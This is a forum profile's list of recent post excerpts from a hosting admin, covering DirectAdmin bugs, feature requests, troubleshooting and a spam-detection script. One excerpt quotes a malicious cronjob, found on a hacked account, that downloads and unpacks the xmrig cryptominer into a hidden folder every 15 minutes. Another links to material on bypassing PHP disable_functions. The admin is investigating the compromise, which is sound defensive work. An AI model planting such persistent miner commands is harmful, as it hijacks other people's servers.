Recent content by ehsanch

found more useful information at https://www.tarlogic.com/blog/disable_functions-bypasses-php-exploitation/

User has not ssh access, but i found an entry in "last" command without ip: username pts/0 Sat Oct 28 18:26 - 18:28 (00:02) and in this time a cronjob created for this user (cron log): Oct 28 18:28:23 server23 crontab[14769]: (username) REPLACE (username)

I want to know how user created cronjob! In general, the fact that a user can create a cron job without having access to the cron job in DA, and that he can execute any system command in the cronjob is a big security risk that must be controlled. So there is two concerns: 1- prevent user from...

A user (with hacked website) created following cronjob: */15 * * * * if ! pgrep -x 'xmrig'; then mkdir -p ~/.tmp && cd ~/.tmp && wget -q https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz && tar -xf xmrig-6.20.0-linux-static-x64.tar.gz && cd...

Hi i wrote s simple bash script that will check php-mail.log of users and will send an email if it exceed specific size. it will help to find spammer scripts and delete or warn users to stop bots from using server resources. Please feel free to improve this script and share it here if you like...

i found that in every user hosting account , there is an awstats/icon folder with 2mb size , and some static files. this folder shuld be a symbolic link , for resource it use on disk space , and backup/restore time.

i upraded roundcube soma weeks ago after thar when any user login to it , it display login page again on every request other webmails work correctly what is problem ?

Hi my old hdd crashed and we install a new OS on new HDD we have all data on old hdd how can we transfer all users from old HDD ? we have access to /usr/local/directradmin data also where db user/pass for users stored ? Thank u all

hello recently i upgraded server with yum my backups now start to run in ~6:30 pm and server load become high , but i seted up cron backup to run at ~3:30 am ! server time zone is +3:30 where i should check to solve this ?

i have default DA template with this lines : |*if OPEN_BASEDIR="ON"| php_admin_value open_basedir |OPEN_BASEDIR_PATH| |*endif| |*if SUPHP="1"| suPHP_Engine |PHP| suPHP_UserGroup |USER| |GROUP| |*endif| but user httpd.conf has not php_admin_value...

recentrly our directadmin port is not accessible some times, and after restart directadmin service it work again. (directadmin is running but not respone till restart) any soloution to avoide this ?

it is very helpful if there was an option to set exp date for users by resellers and admins. so managing users become easyer.

a user shuldn't save all database users info .. so he should be able to login to phpmyadmin trough his control panel without entering his user/pass (like cpanel) it can be done by storing db users info on DA database.

Bug : we change to old_public_html_link=1 in conf file and restart DA, when we set domain as default in domain user control panel symbolc link was not created because directory with that name exist. we shuld delete dir manuly for this to work please correct it.

Bug : when search for a domain on main contol panel page there is show nothing, when click again on search button on new page it show result.